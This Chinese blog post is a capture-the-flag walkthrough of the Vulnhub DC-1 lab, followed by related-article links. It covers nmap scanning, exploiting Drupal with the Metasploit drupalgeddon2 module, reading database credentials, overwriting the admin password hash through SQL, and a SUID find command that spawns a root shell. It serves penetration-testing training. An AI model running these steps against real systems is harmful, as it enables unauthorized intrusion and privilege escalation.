看完这篇 教你玩转渗透测试靶机vulnhub——DC1

简介: 看完这篇 教你玩转渗透测试靶机vulnhub——DC1

Vulnhub靶机DC1渗透测试详解
Vulnhub靶机介绍:
Vulnhub靶机下载:
Vulnhub靶机安装:
Vulnhub靶机漏洞详解:
①:信息收集:
②:漏洞发现:
③:漏洞利用:
④:SUID提权:
⑤:获取Flag:
Vulnhub靶机渗透总结:
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

Vulnhub靶机下载:
官网地址:https://www.vulnhub.com/entry/dc-1,292/

Vulnhub靶机安装:
下载好了把安装包解压 然后试用VMware即可。

Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover发现主机

渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.7

使用命令:nmap -sS -sV -A -n 172.16.5.7

先访问一下80端口 发现是一个CMS 下标有个Drupal

②:漏洞发现:
首先要了解一下Drupal,Drupal是开源CMS之一,Drupal是CMS内容管理系统,并且在世界各地使用,受到高度赞赏,Drupal可以作为开源软件免费使用,就是附带了cms的php开发框架。

搜了一下相关的drupal 漏洞 打开msf 看一下有哪些具体的模块可以使用 exploit/unix/webapp/drupal_drupalgeddon2

③:漏洞利用:
进入后渗透模块 ls 查看 有i个flag1.txt cat一下 提示:让我们看一下配置文件 durpal配置 /sites/default/settings.php

进入durpa配置文件在 settings.php 发现 flag2 和数据库一些信息

使用netstat -anptl查看3306是否开放,结果只允许本地连接

写一个python交互:python -c "import pty;pty.spawn(’/bin/bash‘)" (容易打错,切记要细心!!)

然后登入数据库 mysql -u 用户名 -p 密码 即可。

show databases; ##列出数据库
1

use drupaldb; ##使用drupaldb库
1
show tables; ##查看里面的表
1

查看users表select * from users;

在scripts录有password-hash.sh文件,可以用该文件生成自己的密码hash值替换数据库hash,达到登陆后台的目的 这里我写的password 。

使用 php scripts/password-hash.sh password

update drupaldb.users set pass="$S$DYyHOGvUlVey/TRbXOU7.Gsp2wKX.9Q9Jt/SFd085Xhq.cAR.S0u" where name="admin"; ##修改密码
1

Flag3提示词有perms、find、-exec、shadow共四个特殊提示词

④:SUID提权:
cat /etc/passwd 发现了一个用户 flag4

使用find命令查找有特殊权限suid的命令:find / -perm -4000

使用find命令提权

find ./ aaa -exec '/bin/sh' \;
1

⑤:获取Flag:

至此五个flag全部找出来了,渗透测试结束。

Vulnhub靶机渗透总结:
这个靶场也不难 只要细心一点就可以了,需要主要的一些细节就是 :
1.写python交互的时候 要注意 容易写错,自己试了好几遍才成功的!!
2.数据库修改密码 因为 shell里面是不能复制的所以 手动打的话 还是要认真仔细不然也容易出错。
3.学习了使用find命令找suid和提权
————————————————
版权声明:本文为CSDN博主「落寞的魚丶」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/Aluxian_/article/details/123613949

相关文章
|
6月前
|
SQL 安全 Shell
vulnhub靶机实战_DC-3
本文介绍DC-3靶机渗透测试全过程,涵盖环境搭建、信息扫描、SQL注入、权限提升等环节。通过Joomla漏洞获取管理员密码,上传木马并提权至root,最终获取flag,是一套完整的渗透实战流程。
2909 1
|
6月前
|
SQL Shell 网络安全
vulnhub靶机实战_DC-8
本文介绍DC-8靶机渗透全过程,涵盖环境搭建、信息扫描、SQL注入、密码爆破、反向Shell获取及提权。利用sqlmap与john工具破解用户凭据,通过Web表单执行命令并获取root权限,最终读取flag完成渗透测试。
999 0
|
6月前
|
关系型数据库 MySQL 网络安全
vulnhub靶机实战_DC-7
本文介绍DC-7靶机渗透测试全过程,包括靶机下载、VMware导入、网络配置、Nmap扫描发现开放80和22端口,通过信息搜集获取数据库凭证,尝试登录SSH成功,获得系统访问权限。适合网络安全学习者实践渗透流程。
244 0
|
6月前
|
中间件 测试技术 应用服务中间件
vulnhub靶机实战_DC-5
本教程介绍如何下载并配置DC-5靶机进行安全测试。内容包括靶机下载链接、VMware导入步骤、网络设置及Nmap扫描分析,帮助快速搭建渗透测试环境。
337 0
|
6月前
|
存储 安全 Shell
vulnhub靶机实战_DC-4
本文介绍了DC-4靶机渗透测试的完整过程,包括靶机下载、环境搭建、信息扫描、漏洞利用、提权以及最终获取flag的详细步骤。通过使用工具如nmap、Hydra进行端口扫描与密码爆破,结合反向Shell与teehee命令实现权限提升,最终成功获取系统flag。内容详实,适合网络安全学习与实践。
964 0
vulnhub靶机实战_DC-4
|
6月前
|
安全 网络安全 开发工具
vulnhub靶机实战_DC-2
本文介绍了DC-2靶机的渗透测试实战过程,涵盖靶机下载、环境搭建、信息扫描、漏洞利用、权限提升及最终提权获取flag的完整流程。内容包括使用nmap扫描、WPScan和Hydra工具爆破登录信息,绕过rbash限制,利用git提权等关键技术步骤。
629 0
|
6月前
|
安全 网络安全 数据库
vulnhub靶机实战_DC-1
本实验通过启动靶机、扫描漏洞、攻击Drupal服务、获取数据库权限、提权至root,最终成功获取所有flag,完成渗透测试目标。
650 0
vulnhub靶机实战_DC-1
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
231 4
|
6月前
|
存储 安全 Linux
Kali Linux 2025.3 发布 (Vagrant & Nexmon) - 领先的渗透测试发行版
Kali Linux 2025.3 发布 (Vagrant & Nexmon) - 领先的渗透测试发行版
748 0
|
安全 Linux 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
1490 2